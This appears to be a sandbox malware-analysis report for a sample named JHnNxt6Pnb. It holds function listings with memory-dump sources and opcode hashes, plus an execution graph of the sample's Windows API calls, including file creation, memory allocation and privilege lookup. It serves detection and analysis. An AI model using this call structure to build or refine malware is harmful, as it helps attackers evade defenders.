                                                                                                                              control_flow_graph 198 e3d718-e3d7b4 DuplicateHandle 199 e3d7b6-e3d7bc 198->199 200 e3d7bd-e3d7da 198->200 199->200
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E3D7A7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              • Opcode ID: f137af5ab73304928f76d5d850cb5647b59de09f21d7851e0bd78e80e57c4f79
                                                                                                                              • Instruction ID: 6c378ddfbaf574a286c8c8760eb19009ed11557ed13e6c1c6351b4d2f5e1fd18
                                                                                                                              • Opcode Fuzzy Hash: f137af5ab73304928f76d5d850cb5647b59de09f21d7851e0bd78e80e57c4f79
                                                                                                                              • Instruction Fuzzy Hash: 8D21E0B59003499FDB10CFAAD984ADEBFF5EB88310F14801AE958B3350C378A954CFA5
                                                                                                                              Function 00E3D720 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 203 e3d720-e3d7b4 DuplicateHandle 204 e3d7b6-e3d7bc 203->204 205 e3d7bd-e3d7da 203->205 204->205
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E3D7A7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              • Opcode ID: f2fb52578423a2d67fe266f29d2be30a9585e7b957dcf33baf99d37a4c007c3d
                                                                                                                              • Instruction ID: a6cf12a742fe93fb32e260b120ef1d499e6d31cd8eed5dd8fb38cb9c4e6c8f22
                                                                                                                              • Opcode Fuzzy Hash: f2fb52578423a2d67fe266f29d2be30a9585e7b957dcf33baf99d37a4c007c3d
                                                                                                                              • Instruction Fuzzy Hash: 0521E4B59003499FDB10CFAAD884ADEBFF8FB48310F14801AE918A3350C374A950CF65
                                                                                                                              Function 00E3B440 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 208 e3b440-e3b480 209 e3b482-e3b485 208->209 210 e3b488-e3b4b3 GetModuleHandleW 208->210 209->210 211 e3b4b5-e3b4bb 210->211 212 e3b4bc-e3b4d0 210->212 211->212
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00E3B4A6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: 257adcee4b8af1bc62bc59bb9be3774d8ebaca13d2a6826b1556afd091f45d2a
                                                                                                                              • Instruction ID: c4bab0bc4e4c2a125f2e9103bbd6778d74d8eafb910f03087e855e43244c2b63
                                                                                                                              • Opcode Fuzzy Hash: 257adcee4b8af1bc62bc59bb9be3774d8ebaca13d2a6826b1556afd091f45d2a
                                                                                                                              • Instruction Fuzzy Hash: B71102B5C003498FCB10DF9AC444A9EFBF4AB88324F10841AD529B7601D379A545CFA5
                                                                                                                              Function 00CCD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538021874.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_ccd000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7c8fdae87f6bd1f81b97479b18ed6a3e5a79924639f9aa30f901995b922c74ed
                                                                                                                              • Instruction ID: a73ec4eb3d84603730600e6ccc83c3b9f9cbfd92f15159eff7ac4e0c2d159c9f
                                                                                                                              • Opcode Fuzzy Hash: 7c8fdae87f6bd1f81b97479b18ed6a3e5a79924639f9aa30f901995b922c74ed
                                                                                                                              • Instruction Fuzzy Hash: CF21F1B5604304DFDB08DF10D9C4F26BB65FB98324F24C17DEA0A0B256C336E856CAA2
                                                                                                                              Function 00CDD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538079208.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_cdd000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e00076b986848d3ba1095fd856cf00661b6f7ca5efb77dde8303e6a154a9dbe0
                                                                                                                              • Instruction ID: 93b18cefff0508ad00ca982aeed151f1d4efdee041c086178e1b9126a0308721
                                                                                                                              • Opcode Fuzzy Hash: e00076b986848d3ba1095fd856cf00661b6f7ca5efb77dde8303e6a154a9dbe0
                                                                                                                              • Instruction Fuzzy Hash: 4021C175A043049FDB14DF14D984B16BB65EBC4314F24C56ADA4A4B386C336E846CA62
                                                                                                                              Function 00CDD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538079208.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_cdd000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4dc019dcd8ebc7f72b1355efe4d193413ef7203ad5bc4f77f4cbd6d6c338fd0a
                                                                                                                              • Instruction ID: 44766b116073273e91aad5c800c3d6aee13761a5a15bafd37140912358e4c238
                                                                                                                              • Opcode Fuzzy Hash: 4dc019dcd8ebc7f72b1355efe4d193413ef7203ad5bc4f77f4cbd6d6c338fd0a
                                                                                                                              • Instruction Fuzzy Hash: 8C21F275A04304EFDB05DF10D9C4B26BBA5FB84314F20C6AEEA4A4B392C336DC46CA61
                                                                                                                              Function 00CDD005 Relevance: .1, Instructions: 62COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538079208.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_cdd000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 24ed2deb6a89f50456438308c6199903480edb59ecc32e09b7646b4c8443609d
                                                                                                                              • Instruction ID: 70da1fb145da6b6d1e7d8a4446f343ab8c66fe0616a27233b2fbdeb9176068aa
                                                                                                                              • Opcode Fuzzy Hash: 24ed2deb6a89f50456438308c6199903480edb59ecc32e09b7646b4c8443609d
                                                                                                                              • Instruction Fuzzy Hash: 7F218E755093808FCB12CF24D990715BF71EB86314F28C5EBD9498B6A7C33A980ACB62
                                                                                                                              Function 00CCD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538021874.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_ccd000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                                              • Instruction ID: 2a0b40d27812605ca7ba8455b4cb4fa6f92b3aae2276eee61cd1b97019105487
                                                                                                                              • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                                              • Instruction Fuzzy Hash: 39110376504240DFCB05CF00D9C0B16BF72FB94324F24C2ADD90A0B256C33AE956CBA1
                                                                                                                              Function 00CDD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538079208.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_cdd000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                                                              • Instruction ID: 00dab7302c501ef7946a848be0dc2b39d0e7d11949ce43b296e6335a1d8c2c45
                                                                                                                              • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                                                              • Instruction Fuzzy Hash: A911A975904280DFCB01DF10C5C0B15FBA2FB84324F24C6AAD94A4B796C33AD84ACB61
                                                                                                                              Function 00CCD731 Relevance: .0, Instructions: 45COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538021874.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_ccd000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ecd8a30292e6e380ddc054a2974c4aa53bd878f0a91457232c851deae7165041
                                                                                                                              • Instruction ID: f2d338de46a959ea259210738e42d620afd61fd67a951445be0591642b53a87f
                                                                                                                              • Opcode Fuzzy Hash: ecd8a30292e6e380ddc054a2974c4aa53bd878f0a91457232c851deae7165041
                                                                                                                              • Instruction Fuzzy Hash: 0301A2714083489BE7105A26CDC4F66BFD8EF81725F28C47EED1A5A686D2789840CBB2
                                                                                                                              Function 00CCD730 Relevance: .0, Instructions: 36COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538021874.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_ccd000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 89a2c4d24c3d2b7bcbae6be9b956d426fe5ff2da9c50ecee0dc78f92005b3440
                                                                                                                              • Instruction ID: a655ec7adc7f18bf948d368ba20896d6788e2ce4a0e21a35cfa2eb060e61e2e4
                                                                                                                              • Opcode Fuzzy Hash: 89a2c4d24c3d2b7bcbae6be9b956d426fe5ff2da9c50ecee0dc78f92005b3440
                                                                                                                              • Instruction Fuzzy Hash: FFF0C2310043449EE7108A15CD84B62FFD8EB80734F28C46EED195E286C2789840CBB1

                                                                                                                              Non-executed Functions

                                                                                                                              Function 04F80040 Relevance: .3, Instructions: 315COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1543522382.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_4f80000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d4566cbcdc7ca4a35dcedc2bc996d7f5f41312fef603ccaa58c79dcebd0b26d5
                                                                                                                              • Instruction ID: 169addebfdac9c24dc83ecf102307d8687509ecfcc46e7f6f65a2ae8c47c9fef
                                                                                                                              • Opcode Fuzzy Hash: d4566cbcdc7ca4a35dcedc2bc996d7f5f41312fef603ccaa58c79dcebd0b26d5
                                                                                                                              • Instruction Fuzzy Hash: 8E1265F04027498ED732EF66ED6C1893BB1B745318B90430AD2E56A2E9D7BE154BCF44
                                                                                                                              Function 00E3E08C Relevance: .3, Instructions: 264COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1538629085.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_e30000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: eaf02b1e9d22e126d31922eb6c16f1f54d4cbe4e0788976abc4920c41e3d861f
                                                                                                                              • Instruction ID: 20509bfb59d5bccb7a6e7845804ced38fa643a75da81484f842fdaa5f20d0a40
                                                                                                                              • Opcode Fuzzy Hash: eaf02b1e9d22e126d31922eb6c16f1f54d4cbe4e0788976abc4920c41e3d861f
                                                                                                                              • Instruction Fuzzy Hash: BAA16B32E002098FCF19DFA5C88859EBBF2BF85304F15957AE801BB265DB75E915CB90
                                                                                                                              Function 04F8001E Relevance: .2, Instructions: 234COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1543522382.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_4f80000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5f92b703eed45d7e8b4158981078a80c55e37e19b4f0951ff5ffce072841d280
                                                                                                                              • Instruction ID: 6007475685b89d427465aee7bec07cfdde663a9859a18189205d2b5c4933b115
                                                                                                                              • Opcode Fuzzy Hash: 5f92b703eed45d7e8b4158981078a80c55e37e19b4f0951ff5ffce072841d280
                                                                                                                              • Instruction Fuzzy Hash: 5EC1F8F180278A8FD732DF66EC681893BB1BB85314B50430AD1A16B2D9DBBE154BCF44

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:1.4%
                                                                                                                              Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                              Signature Coverage:5.8%
                                                                                                                              Total number of Nodes:548
                                                                                                                              Total number of Limit Nodes:69
                                                                                                                              execution_graph 96529 41f080 96530 41f08b 96529->96530 96532 41b930 96529->96532 96533 41b956 96532->96533 96540 409d30 96533->96540 96535 41b962 96536 41b983 96535->96536 96548 40c1b0 96535->96548 96536->96530 96538 41b975 96584 41a670 96538->96584 96543 409d3d 96540->96543 96587 409c80 96540->96587 96542 409d44 96542->96535 96543->96542 96599 409c20 96543->96599 96549 40c1d5 96548->96549 97007 40b1b0 96549->97007 96551 40c22c 97011 40ae30 96551->97011 96553 40c252 96583 40c4a3 96553->96583 97020 414390 96553->97020 96555 40c297 96555->96583 97023 408a60 96555->97023 96557 40c2db 96557->96583 97030 41a4c0 96557->97030 96561 40c331 96562 40c338 96561->96562 97042 419fd0 96561->97042 96563 41bd80 2 API calls 96562->96563 96566 40c345 96563->96566 96566->96538 96567 40c382 96568 41bd80 2 API calls 96567->96568 96569 40c389 96568->96569 96569->96538 96570 40c392 96571 40f490 3 API calls 96570->96571 96572 40c406 96571->96572 96572->96562 96573 40c411 96572->96573 96574 41bd80 2 API calls 96573->96574 96575 40c435 96574->96575 97047 41a020 96575->97047 96578 419fd0 2 API calls 96579 40c470 96578->96579 96579->96583 97052 419de0 96579->97052 96582 41a670 2 API calls 96582->96583 96583->96538 96585 41af20 LdrLoadDll 96584->96585 96586 41a68f ExitProcess 96585->96586 96586->96536 96588 409c93 96587->96588 96638 418b80 LdrLoadDll 96587->96638 96618 418a30 96588->96618 96591 409ca6 96591->96543 96592 409c9c 96592->96591 96621 41b270 96592->96621 96594 409ce3 96594->96591 96632 409aa0 96594->96632 96596 409d03 96639 409620 LdrLoadDll 96596->96639 96598 409d15 96598->96543 96600 409c3a 96599->96600 96601 41b560 LdrLoadDll 96599->96601 96982 41b560 96600->96982 96601->96600 96604 41b560 LdrLoadDll 96605 409c61 96604->96605 96606 40f170 96605->96606 96607 40f189 96606->96607 96990 40b030 96607->96990 96609 40f19c 96994 41a1a0 96609->96994 96613 40f1c2 96617 40f1ed 96613->96617 97000 41a220 96613->97000 96614 41a450 2 API calls 96616 409d55 96614->96616 96616->96535 96617->96614 96640 41a5c0 96618->96640 96622 41b289 96621->96622 96653 414a40 96622->96653 96624 41b2a1 96625 41b2aa 96624->96625 96692 41b0b0 96624->96692 96625->96594 96627 41b2be 96627->96625 96710 419ec0 96627->96710 96629 41b2f2 96629->96629 96715 41bd80 96629->96715 96960 407ea0 96632->96960 96634 409ac1 96634->96596 96635 409aba 96635->96634 96973 408160 96635->96973 96638->96588 96639->96598 96643 41af20 96640->96643 96642 418a45 96642->96592 96644 41af30 96643->96644 96646 41af52 96643->96646 96647 414e40 96644->96647 96646->96642 96648 414e5a 96647->96648 96649 414e4e 96647->96649 96648->96646 96649->96648 96652 4152c0 LdrLoadDll 96649->96652 96651 414fac 96651->96646 96652->96651 96654 414d75 96653->96654 96655 414a54 96653->96655 96654->96624 96655->96654 96718 419c10 96655->96718 96658 414b80 96721 41a320 96658->96721 96659 414b63 96778 41a420 LdrLoadDll 96659->96778 96662 414b6d 96662->96624 96663 414ba7 96664 41bd80 2 API calls 96663->96664 96666 414bb3 96664->96666 96665 414d39 96668 41a450 2 API calls 96665->96668 96666->96662 96666->96665 96667 414d4f 96666->96667 96672 414c42 96666->96672 96787 414780 LdrLoadDll NtReadFile NtClose 96667->96787 96669 414d40 96668->96669 96669->96624 96671 414d62 96671->96624 96673 414ca9 96672->96673 96675 414c51 96672->96675 96673->96665 96674 414cbc 96673->96674 96780 41a2a0 96674->96780 96677 414c56 96675->96677 96678 414c6a 96675->96678 96779 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 96677->96779 96681 414c87 96678->96681 96682 414c6f 96678->96682 96681->96669 96736 414400 96681->96736 96724 4146e0 96682->96724 96684 414c60 96684->96624 96686 414d1c 96784 41a450 96686->96784 96687 414c7d 96687->96624 96690 414c9f 96690->96624 96691 414d28 96691->96624 96694 41b0c1 96692->96694 96693 41b0d3 96693->96627 96694->96693 96805 41bd00 96694->96805 96696 41b0f4 96808 414060 96696->96808 96698 41b140 96698->96627 96699 41b117 96699->96698 96700 414060 3 API calls 96699->96700 96702 41b139 96700->96702 96702->96698 96833 415380 96702->96833 96703 41b1ca 96704 41b1da 96703->96704 96927 41aec0 LdrLoadDll 96703->96927 96843 41ad30 96704->96843 96707 41b208 96922 419e80 96707->96922 96711 41af20 LdrLoadDll 96710->96711 96712 419edc 96711->96712 96954 1a22c0a 96712->96954 96713 419ef7 96713->96629 96716 41b319 96715->96716 96957 41a630 96715->96957 96716->96594 96719 414b34 96718->96719 96720 41af20 LdrLoadDll 96718->96720 96719->96658 96719->96659 96719->96662 96720->96719 96722 41a33c NtCreateFile 96721->96722 96723 41af20 LdrLoadDll 96721->96723 96722->96663 96723->96722 96725 4146fc 96724->96725 96726 41a2a0 LdrLoadDll 96725->96726 96727 41471d 96726->96727 96728 414724 96727->96728 96729 414738 96727->96729 96731 41a450 2 API calls 96728->96731 96730 41a450 2 API calls 96729->96730 96732 414741 96730->96732 96733 41472d 96731->96733 96788 41bf90 LdrLoadDll RtlAllocateHeap 96732->96788 96733->96687 96735 41474c 96735->96687 96737 41444b 96736->96737 96738 41447e 96736->96738 96740 41a2a0 LdrLoadDll 96737->96740 96739 4145c9 96738->96739 96743 41449a 96738->96743 96741 41a2a0 LdrLoadDll 96739->96741 96742 414466 96740->96742 96748 4145e4 96741->96748 96744 41a450 2 API calls 96742->96744 96746 41a2a0 LdrLoadDll 96743->96746 96745 41446f 96744->96745 96745->96690 96747 4144b5 96746->96747 96750 4144d1 96747->96750 96751 4144bc 96747->96751 96801 41a2e0 LdrLoadDll 96748->96801 96754 4144d6 96750->96754 96758 4144ec 96750->96758 96753 41a450 2 API calls 96751->96753 96752 41461e 96755 41a450 2 API calls 96752->96755 96756 4144c5 96753->96756 96757 41a450 2 API calls 96754->96757 96759 414629 96755->96759 96756->96690 96760 4144df 96757->96760 96763 4144f1 96758->96763 96789 41bf50 96758->96789 96759->96690 96760->96690 96772 414503 96763->96772 96792 41a3d0 96763->96792 96764 414557 96765 41456e 96764->96765 96800 41a260 LdrLoadDll 96764->96800 96767 414575 96765->96767 96768 41458a 96765->96768 96770 41a450 2 API calls 96767->96770 96769 41a450 2 API calls 96768->96769 96771 414593 96769->96771 96770->96772 96773 4145bf 96771->96773 96795 41bb50 96771->96795 96772->96690 96773->96690 96775 4145aa 96776 41bd80 2 API calls 96775->96776 96777 4145b3 96776->96777 96777->96690 96778->96662 96779->96684 96781 414d04 96780->96781 96782 41af20 LdrLoadDll 96780->96782 96783 41a2e0 LdrLoadDll 96781->96783 96782->96781 96783->96686 96785 41a46c NtClose 96784->96785 96786 41af20 LdrLoadDll 96784->96786 96785->96691 96786->96785 96787->96671 96788->96735 96791 41bf68 96789->96791 96802 41a5f0 96789->96802 96791->96763 96793 41af20 LdrLoadDll 96792->96793 96794 41a3ec NtReadFile 96793->96794 96794->96764 96796 41bb74 96795->96796 96797 41bb5d 96795->96797 96796->96775 96797->96796 96798 41bf50 2 API calls 96797->96798 96799 41bb8b 96798->96799 96799->96775 96800->96765 96801->96752 96803 41af20 LdrLoadDll 96802->96803 96804 41a60c RtlAllocateHeap 96803->96804 96804->96791 96806 41bd2d 96805->96806 96928 41a500 96805->96928 96806->96696 96809 414071 96808->96809 96810 414079 96808->96810 96809->96699 96832 41434c 96810->96832 96931 41cef0 96810->96931 96812 4140cd 96813 41cef0 2 API calls 96812->96813 96816 4140d8 96813->96816 96814 414126 96817 41cef0 2 API calls 96814->96817 96816->96814 96936 41cf90 96816->96936 96818 41413a 96817->96818 96819 41cef0 2 API calls 96818->96819 96821 4141ad 96819->96821 96820 41cef0 2 API calls 96827 4141f5 96820->96827 96821->96820 96823 414324 96943 41cf50 LdrLoadDll RtlFreeHeap 96823->96943 96825 41432e 96944 41cf50 LdrLoadDll RtlFreeHeap 96825->96944 96942 41cf50 LdrLoadDll RtlFreeHeap 96827->96942 96828 414338 96945 41cf50 LdrLoadDll RtlFreeHeap 96828->96945 96830 414342 96946 41cf50 LdrLoadDll RtlFreeHeap 96830->96946 96832->96699 96834 415391 96833->96834 96835 414a40 8 API calls 96834->96835 96837 4153a7 96835->96837 96836 4153fa 96836->96703 96837->96836 96838 4153e2 96837->96838 96839 4153f5 96837->96839 96840 41bd80 2 API calls 96838->96840 96841 41bd80 2 API calls 96839->96841 96842 4153e7 96840->96842 96841->96836 96842->96703 96844 41ad44 96843->96844 96845 41abf0 LdrLoadDll 96843->96845 96947 41abf0 96844->96947 96845->96844 96848 41abf0 LdrLoadDll 96849 41ad56 96848->96849 96850 41abf0 LdrLoadDll 96849->96850 96851 41ad5f 96850->96851 96852 41abf0 LdrLoadDll 96851->96852 96853 41ad68 96852->96853 96854 41abf0 LdrLoadDll 96853->96854 96855 41ad71 96854->96855 96856 41abf0 LdrLoadDll 96855->96856 96857 41ad7d 96856->96857 96858 41abf0 LdrLoadDll 96857->96858 96859 41ad86 96858->96859 96860 41abf0 LdrLoadDll 96859->96860 96861 41ad8f 96860->96861 96862 41abf0 LdrLoadDll 96861->96862 96863 41ad98 96862->96863 96864 41abf0 LdrLoadDll 96863->96864 96865 41ada1 96864->96865 96866 41abf0 LdrLoadDll 96865->96866 96867 41adaa 96866->96867 96868 41abf0 LdrLoadDll 96867->96868 96869 41adb6 96868->96869 96870 41abf0 LdrLoadDll 96869->96870 96871 41adbf 96870->96871 96872 41abf0 LdrLoadDll 96871->96872 96873 41adc8 96872->96873 96874 41abf0 LdrLoadDll 96873->96874 96875 41add1 96874->96875 96876 41abf0 LdrLoadDll 96875->96876 96877 41adda 96876->96877 96878 41abf0 LdrLoadDll 96877->96878 96879 41ade3 96878->96879 96880 41abf0 LdrLoadDll 96879->96880 96881 41adef 96880->96881 96882 41abf0 LdrLoadDll 96881->96882 96883 41adf8 96882->96883 96884 41abf0 LdrLoadDll 96883->96884 96885 41ae01 96884->96885 96886 41abf0 LdrLoadDll 96885->96886 96887 41ae0a 96886->96887 96888 41abf0 LdrLoadDll 96887->96888 96889 41ae13 96888->96889 96890 41abf0 LdrLoadDll 96889->96890 96891 41ae1c 96890->96891 96892 41abf0 LdrLoadDll 96891->96892 96893 41ae28 96892->96893 96894 41abf0 LdrLoadDll 96893->96894 96895 41ae31 96894->96895 96896 41abf0 LdrLoadDll 96895->96896 96897 41ae3a 96896->96897 96898 41abf0 LdrLoadDll 96897->96898 96899 41ae43 96898->96899 96900 41abf0 LdrLoadDll 96899->96900 96901 41ae4c 96900->96901 96902 41abf0 LdrLoadDll 96901->96902 96903 41ae55 96902->96903 96904 41abf0 LdrLoadDll 96903->96904 96905 41ae61 96904->96905 96906 41abf0 LdrLoadDll 96905->96906 96907 41ae6a 96906->96907 96908 41abf0 LdrLoadDll 96907->96908 96909 41ae73 96908->96909 96910 41abf0 LdrLoadDll 96909->96910 96911 41ae7c 96910->96911 96912 41abf0 LdrLoadDll 96911->96912 96913 41ae85 96912->96913 96914 41abf0 LdrLoadDll 96913->96914 96915 41ae8e 96914->96915 96916 41abf0 LdrLoadDll 96915->96916 96917 41ae9a 96916->96917 96918 41abf0 LdrLoadDll 96917->96918 96919 41aea3 96918->96919 96920 41abf0 LdrLoadDll 96919->96920 96921 41aeac 96920->96921 96921->96707 96923 41af20 LdrLoadDll 96922->96923 96924 419e9c 96923->96924 96925 419eb3 96924->96925 96953 1a22df0 LdrInitializeThunk 96924->96953 96925->96627 96927->96704 96929 41a51c NtAllocateVirtualMemory 96928->96929 96930 41af20 LdrLoadDll 96928->96930 96929->96806 96930->96929 96932 41cf00 96931->96932 96933 41cf06 96931->96933 96932->96812 96934 41bf50 2 API calls 96933->96934 96935 41cf2c 96934->96935 96935->96812 96937 41cfb5 96936->96937 96939 41cfed 96936->96939 96938 41bf50 2 API calls 96937->96938 96940 41cfca 96938->96940 96939->96816 96941 41bd80 2 API calls 96940->96941 96941->96939 96942->96823 96943->96825 96944->96828 96945->96830 96946->96832 96948 41ac0b 96947->96948 96949 414e40 LdrLoadDll 96948->96949 96950 41ac2b 96949->96950 96951 414e40 LdrLoadDll 96950->96951 96952 41acd7 96950->96952 96951->96952 96952->96848 96953->96925 96955 1a22c1f LdrInitializeThunk 96954->96955 96956 1a22c11 96954->96956 96955->96713 96956->96713 96958 41af20 LdrLoadDll 96957->96958 96959 41a64c RtlFreeHeap 96958->96959 96959->96716 96961 407eb0 96960->96961 96962 407eab 96960->96962 96963 41bd00 2 API calls 96961->96963 96962->96635 96964 407ed5 96963->96964 96965 407f38 96964->96965 96966 419e80 2 API calls 96964->96966 96967 407f3e 96964->96967 96971 41bd00 2 API calls 96964->96971 96976 41a580 96964->96976 96965->96635 96966->96964 96969 407f64 96967->96969 96970 41a580 2 API calls 96967->96970 96969->96635 96972 407f55 96970->96972 96971->96964 96972->96635 96974 40817e 96973->96974 96975 41a580 2 API calls 96973->96975 96974->96596 96975->96974 96977 41af20 LdrLoadDll 96976->96977 96978 41a59c 96977->96978 96981 1a22c70 LdrInitializeThunk 96978->96981 96979 41a5b3 96979->96964 96981->96979 96983 41b583 96982->96983 96986 40ace0 96983->96986 96987 40ad04 96986->96987 96988 40ad40 LdrLoadDll 96987->96988 96989 409c4b 96987->96989 96988->96989 96989->96604 96991 40b053 96990->96991 96993 40b0d0 96991->96993 97005 419c50 LdrLoadDll 96991->97005 96993->96609 96995 41af20 LdrLoadDll 96994->96995 96996 40f1ab 96995->96996 96996->96616 96997 41a790 96996->96997 96998 41a7af LookupPrivilegeValueW 96997->96998 96999 41af20 LdrLoadDll 